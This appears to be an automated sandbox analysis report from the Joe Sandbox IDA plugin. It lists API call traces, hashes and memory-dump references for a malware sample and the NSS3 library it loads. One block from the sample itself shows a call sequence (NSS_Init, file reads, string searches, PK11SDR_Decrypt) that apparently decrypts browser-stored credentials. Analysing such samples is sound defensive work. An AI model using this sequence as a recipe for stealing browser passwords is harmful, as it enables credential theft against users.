                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                              • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nBl
                                                                                                                                                                                                                                              • API String ID: 1003633598-4108049304
                                                                                                                                                                                                                                              • Opcode ID: f49ab2d08792df6e73b87633e1b7e7cdda7c32002b26211b5619587798883db9
                                                                                                                                                                                                                                              • Instruction ID: e9828adf1127d3fb8bf4f17dc59e1d1caabdaf7c2ccdef53ee6d68e197f8cccf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f49ab2d08792df6e73b87633e1b7e7cdda7c32002b26211b5619587798883db9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B41A175601164EFDB11EF55DD49F8A3BF5EB8631CF048028E909A7A12DB319858CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C354C4C
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C354C60
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354CA1
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C354CBE
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354CD2
                                                                                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354D3A
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354D4F
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354DB7
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C354DD7
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C354DEC
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C354E1B
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C354E2F
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354E5A
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C354E71
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C354E7A
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C354EA2
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C354EC1
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C354ED6
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C354F01
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C354F2A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                                                                                                                              • Opcode ID: c980e01502ef26a5d0a5f8d217a15c8291f3d1be372b09fcb7e54c63efdca4d8
                                                                                                                                                                                                                                              • Instruction ID: 50931252828927a7876b8f4662c1137f1a74f56ee939cc6fc593657e1f84f9b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c980e01502ef26a5d0a5f8d217a15c8291f3d1be372b09fcb7e54c63efdca4d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46B1F271A002059FDF05EF68D844AAA77B4BF09318F844128EC0597B11E736E974CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C31C4D5
                                                                                                                                                                                                                                                • Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C516
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C530
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C31C54E
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C31C5CB
                                                                                                                                                                                                                                              • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C31C712
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C31C725
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C31C742
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C31C751
                                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C31C77A
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C31C78F
                                                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C31C7A9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                                              • API String ID: 1085474831-3315324353
                                                                                                                                                                                                                                              • Opcode ID: 684fad7cc8ab0c4e000eee47bff5c2834e5f91d86a0c47b9ccf9aed20ea8908b
                                                                                                                                                                                                                                              • Instruction ID: 38a3733b325e4ead9b5389f2331d7437337a63255f7afe2ca3847fa2afdf3761
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 684fad7cc8ab0c4e000eee47bff5c2834e5f91d86a0c47b9ccf9aed20ea8908b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02811871D08108AEEF18EA55EC81BEE7778EF0130CF284135ED05A6E51E762D959CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • NSS_Init.NSS3(00000000), ref: 0040C112
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,040862C8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212
                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,04086298,0041D72E), ref: 0040C260
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,040862B0), ref: 0040C287
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,04086DB8,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,04083868,00000000,?,0041DBB4,00000000,?), ref: 0040C405
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,04086E78), ref: 0040C41C
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,040839A8), ref: 0040BFE1
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,04086E78,00000000,?,0041DBBC,00000000,?,00000000,040839A8), ref: 0040C4BD
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,04083848), ref: 0040C4D4
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040C5A7
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C5F9
                                                                                                                                                                                                                                              • NSS_Shutdown.NSS3 ref: 0040C607
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2844179199-3916222277
                                                                                                                                                                                                                                              • Opcode ID: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
                                                                                                                                                                                                                                              • Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44fef13302315162d7e32ba14433b518de5c58a6dfc62e842c65371e6c7da01b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C344CF3
                                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C344D28
                                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C344D37
                                                                                                                                                                                                                                                • Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C344D4D
                                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C344D7B
                                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C344D8A
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C344DA0
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C344DBC
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C344E20
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nBl
                                                                                                                                                                                                                                              • API String ID: 1003633598-2883561553
                                                                                                                                                                                                                                              • Opcode ID: 36d6afb345613fffff47e33c333282940fc08f13e4543b96cc703e8983ef307f
                                                                                                                                                                                                                                              • Instruction ID: 319f92059b89ddc4533ede9c399b418d9793e68b278f506a9f1f9add38bba1af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36d6afb345613fffff47e33c333282940fc08f13e4543b96cc703e8983ef307f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9341B171601164EFDB01EF14DD89F6A37F5EB4631DF048039E908ABA12DB359948DFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C3DCC7B), ref: 6C3DCD7A
                                                                                                                                                                                                                                                • Part of subcall function 6C3DCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C34C1A8,?), ref: 6C3DCE92
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCDA5
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCDB8
                                                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6C3DCDDB
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCD8E
                                                                                                                                                                                                                                                • Part of subcall function 6C3005C0: PR_EnterMonitor.NSS3 ref: 6C3005D1
                                                                                                                                                                                                                                                • Part of subcall function 6C3005C0: PR_ExitMonitor.NSS3 ref: 6C3005EA
                                                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C3DCDE8
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCDFF
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCE16
                                                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCE29
                                                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6C3DCE48
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                              • API String ID: 601260978-871931242
                                                                                                                                                                                                                                              • Opcode ID: c77c440a789affd6ef1691655a0579104ad42db0636b98992932538a0eb8820c
                                                                                                                                                                                                                                              • Instruction ID: 3629783bd9bbaca416a5c889bb6d85ebb8e6fd0c06d9d5757823e34950aa5750
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c77c440a789affd6ef1691655a0579104ad42db0636b98992932538a0eb8820c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111A2E7E2266197EB02FE753C51D9E2A58AB1210DB294534D80992E41FB21D50C8EF3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(*,8l), ref: 6C380C81
                                                                                                                                                                                                                                                • Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44
                                                                                                                                                                                                                                                • Part of subcall function 6C358500: SECOID_GetAlgorithmTag_Util.NSS3(6C3595DC,00000000,00000000,00000000,?,6C3595DC,00000000,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C358517
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380CC4
                                                                                                                                                                                                                                                • Part of subcall function 6C36FAB0: free.MOZGLUE(?,-00000001,?,?,6C30F673,00000000,00000000), ref: 6C36FAC7
                                                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C380CD5
                                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C380D1D
                                                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C380D3B
                                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C380D7D
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C380DB5
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380DC1
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C380DF7
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C380E05
                                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C380E0F
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C3595E0
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C337F4A,00000000,?,00000000,00000000), ref: 6C3595F5
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C359609
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C35961D
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: PK11_GetInternalSlot.NSS3 ref: 6C35970B
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C359756
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: PK11_GetIVLength.NSS3(?), ref: 6C359767
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C35977E
                                                                                                                                                                                                                                                • Part of subcall function 6C3595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C35978E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                              • String ID: *,8l$*,8l$-$8l
                                                                                                                                                                                                                                              • API String ID: 3136566230-3188397190
                                                                                                                                                                                                                                              • Opcode ID: d8cda2e3f7988818348f95d78c720c78c8c335d1f97c75bf51b51cc4a2792b29
                                                                                                                                                                                                                                              • Instruction ID: a47df658cc002b541cf62aef531d6db44a8b99d94d21468a0ced15d9ab66a528
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8cda2e3f7988818348f95d78c720c78c8c335d1f97c75bf51b51cc4a2792b29
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C941C1B1902255ABEB009F65DC41BEF7678AF0430CF104128ED196BB41E736EA18CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C441DE0,?), ref: 6C376CFE
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C376D26
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C376D70
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6C376D82
                                                                                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6C376DA2
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C376DD8
                                                                                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C376E60
                                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C376F19
